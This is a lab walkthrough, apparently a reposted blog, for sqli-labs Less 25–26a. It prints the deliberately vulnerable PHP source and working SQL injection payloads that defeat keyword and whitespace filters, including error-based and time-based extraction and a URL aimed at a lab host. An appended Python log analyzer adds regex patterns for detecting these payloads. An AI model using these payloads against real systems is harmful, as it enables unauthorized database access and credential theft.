sqli-labs Less 25-sqli-labs Less 26a

  1. Preface
  2. Main body
  3. Summary

Preface

I worked through sqli-labs from Less 25 to Less 26a, and these levels wrecked my nerves. Truly terrifying.

Main body

Practice environment found via FOFA: SQL Injections
Windows and Linux environments call for different methods, because some of the URL encodings that can stand in for a space have no effect on Apache under Windows. I use a Linux environment here; you can of course also find an online one on FOFA.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-25 Trick with OR & AND</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:40px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");


// take the variables 
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    //fiddling with comments
    $id= blacklist($id); /* the blacklist filters out "and" and "or" */
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;

// connectivity 
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
          echo "<font size='5' color= '#99FF00'>";    
          echo 'Your Login name:'. $row['username'];
          echo "<br>";
          echo 'Your Password:' .$row['password'];
          echo "</font>";
      }
    else 
    {
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";  
    }
}
else 
{ 
    echo "Please input the ID as parameter with numeric value";
}


function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/AND/i',"", $id);        //Strip out AND (non case sensitive)

    return $id;
}




?>
</font> </div></br></br></br><center>
<img src="../images/Less-25.jpg" />
</br>
</br>
</br>
<img src="../images/Less-25-1.jpg" />
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
echo "Hint: Your Input is Filtered with following result: ".$hint;
?>
</font> 
</center>
</body>
</html>

Auditing the Less-25 code shows that "and" and "or" are filtered, but the regex only replaces each occurrence of and/or with an empty string, in a single pass. Doubling up the filtered word is enough to bypass the filter.
(All that matters is that the filtered word is reassembled once the filter has run.)

Less 25

anandd oorr


Practical test

' anandd 1=1 --+


Error-based injection

' anandd updatexml(1,concat(0x7e,(select user()),0x7e),1) --+


One thing to note here:

When injecting, remember to double up the "or" inside "information" as well; I agonized over this for ages thinking I had mistyped it. Damn.

Less 25a
Audit the code first

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-25a Trick with OR & AND Blind</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");


// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

    //fiddling with comments
    $id= blacklist($id); /* filter unchanged */
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;

// connectivity 
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";  /* the query form has changed */
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    if($row)
    {
          echo "<font size='5' color= '#99FF00'>";    
          echo 'Your Login name:'. $row['username'];
        //echo 'YOU ARE IN ........';          
        echo "<br>";
          echo 'Your Password:' .$row['password'];
          echo "</font>";
      }
    else 
    {
        echo '<font size="5" color="#FFFF00">';
        //echo 'You are in...........';
        //print_r(mysql_error()); /* MySQL error output is turned off */
        //echo "You have an error in your SQL syntax";
        echo "</br></font>";    
        echo '<font color= "#0000ff" font size= 3>';    

    }
}
    else 
{ 
    echo "Please input the ID as parameter with numeric value";
}

function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/AND/i',"", $id);        //Strip out AND (non case sensitive)

    return $id;
}



?>

</font> </div></br></br></br><center>
<img src="../images/Less-25a.jpg" />
</br>
</br>
</br>
<img src="../images/Less-25a-1.jpg" />
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
echo "Hint: Your Input is Filtered with following result: ".$hint;
?>
</font> 
</center>
</body>
</html>

Since 25a disabled the statement that outputs MySQL errors, blind injection is the only option left

%20anandd%20sleep(if((length(database())=8),1,4))


Less 26
Code audit

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-26 Trick with comments</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:40px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

// take the variables 
if(isset($_GET['id'])) /* check whether the GET parameter id exists */
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n"); /* write to the log */
    fclose($fp);

    //fiddling with comments
    $id= blacklist($id); /* blacklist replacement; the id it returns is used below */
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;

// connectivity 
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
          echo "<font size='5' color= '#99FF00'>";    
          echo 'Your Login name:'. $row['username'];
          echo "<br>";
          echo 'Your Password:' .$row['password'];
          echo "</font>";
      }
    else 
    {
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";  
    }
}
    else { echo "Please input the ID as parameter with numeric value";}




function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes
    return $id;
}



?>
</font> </div></br></br></br><center>
<img src="../images/Less-26.jpg" />
</br>
</br>
</br>
<img src="../images/Less-26-1.jpg" />
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
echo "Hint: Your Input is Filtered with following result: ".$hint;
?>
</font> 
</center>
</body>
</html>

As you can see, the filtering here is strict: and, or, /, /*, whitespace (\s), # and -- are all stripped.
There are many ways to substitute for a space; here I use %a0. Google the other space substitutes yourself. As for and/or being filtered, double them up as before, and close the quotes by hand.

'%a0anandd%a01=1%a0anandd%a0'1'='1


Then error-based injection, the usual routine

'%a0anandd%a0updatexml(1,concat(0x7e,(select%a0user()),0x7e),1)%a0anandd%a0'1'='1


Less 26a
This level is even nastier; closing the quotes is a royal pain

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-26a Trick with comments</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:40px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

// take the variables 
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    //fiddling with comments
    $id= blacklist($id);
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;

// connectivity 
    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; /* the query form has changed */
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
          echo "<font size='5' color= '#99FF00'>";    
          echo 'Your Login name:'. $row['username'];
          echo "<br>";
          echo 'Your Password:' .$row['password'];
          echo "</font>";
      }
    else 
    {
        echo '<font color= "#FFFF00">';
        //print_r(mysql_error()); /* the error output is commented out */
        echo "</font>";  
    }
}
    else { echo "Please input the ID as parameter with numeric value";}




function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes
    return $id;
}



?>
</font> </div></br></br></br><center>
<img src="../images/Less-26-a.jpg" />
</br>
</br>
</br>
<img src="../images/Less-26a-1.jpg" />
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
echo "Hint: Your Input is Filtered with following result: ".$hint;
?>
</font> 
</center>
</body>
</html>

The closing is nasty, and with the filter unchanged we are forced into blind injection

%27)%a0anandd%a0sleep(if((1=1),1,4))%a0anandd%a0(%271%27)=(%271

Enumerating column names

http://118.24.125.87:8000/Less-26a/?id=1%27)%a0anandd%a0sleep(if((3=(select%a0count(column_name)%a0from%a0infoorrmation_schema.columns%a0where%a0table_name=%22users%22)),1,4))%a0anandd%a0(%271%27)=(%271


Summary

When we run into filtering or a WAF in the real world, we can try the following:

1. First work out which word is being filtered
2. Can it be bypassed by doubling the word?
3. Can an equivalent word be substituted?
4. Spaces filtered? Use a URL encoding that the target environment can parse
5. Everything can be fuzzed
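Every level above appends each raw id to result.txt as an "ID:<value>" line, and each of the techniques in this summary leaves a recognisable trace in that value: a doubled keyword, a 0xA0 byte where a space would be, updatexml()/sleep() calls, comment terminators. The following is an added example from the defender's side, not part of the original post: a small analyzer for that log format that flags such entries. The sample log is constructed for this example (PHP has already percent-decoded $_GET, so %20 appears as a space and %a0 as the single byte 0xA0; read the real file as latin-1 to keep that 1:1), and the rule names are mine.

```python
import re
from typing import List, Tuple

# Constructed sample of the lab's result.txt (one "ID:<value>" line per request).
SAMPLE_LOG = (
    "ID:1\n"
    "ID:2\n"
    "ID:1' anandd 1=1 --+\n"
    "ID:1 anandd sleep(if((length(database())=8),1,4))\n"
    "ID:1'\xa0anandd\xa0updatexml(1,concat(0x7e,(select\xa0user()),0x7e),1)"
    "\xa0anandd\xa0'1'='1\n"
    "ID:42\n"
)

# One rule per trait seen in the write-up; names are this example's own.
RULES = [
    ("doubled_keyword", re.compile(r"anandd|oorr", re.I)),           # single-pass strip bypass
    ("nonstandard_whitespace", re.compile(r"[\xa0\x0b\x0c]")),       # %a0 and friends in place of a space
    ("error_based_function", re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I)),
    ("time_based_function", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("comment_terminator", re.compile(r"--[\s+]|#|/\*")),
    ("quote_or_paren", re.compile(r"['\")(]")),
]


def analyze_id(value: str) -> List[str]:
    """Return the names of every rule that fires for one logged id value."""
    hits = []
    if not value.isdigit():          # the lab documents id as a numeric parameter
        hits.append("non_numeric")
    for name, pattern in RULES:
        if pattern.search(value):
            hits.append(name)
    return hits


def analyze_log(text: str) -> List[Tuple[str, List[str]]]:
    """Parse result.txt content and return (value, hits) for every flagged line."""
    flagged = []
    for line in text.splitlines():
        if not line.startswith("ID:"):
            continue                 # ignore anything that is not a logged id
        value = line[len("ID:"):]
        hits = analyze_id(value)
        if hits:
            flagged.append((value, hits))
    return flagged


if __name__ == "__main__":
    for value, hits in analyze_log(SAMPLE_LOG):
        print(hits, "<-", repr(value))
```

The "non_numeric" check alone catches every payload in this write-up, because the id parameter is documented as numeric and none of the payloads can be; the remaining rules only add labels that tell the analyst which technique was tried. The same rules apply unchanged to a web server access log once the query string has been percent-decoded.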

Fuzzing the space to find which URL encoding is usable: Sqli-Labs:Less 26 - Less 26a - 简书
Please state the source when reposting: reposted from 422926799.github.io


Please credit the source when reposting; you are welcome to verify the sources cited in the article and to point out any errors or unclear wording.

Article title: sqli-labs Less 25-sqli-labs Less 26a

Author: 九世

Published: 2019-01-25, 09:58:59

Last updated: 2019-04-19, 20:36:16

Original link: http://422926799.github.io/posts/3c935757.html

License: "Attribution-NonCommercial-ShareAlike 4.0"; keep the original link and author when reposting.
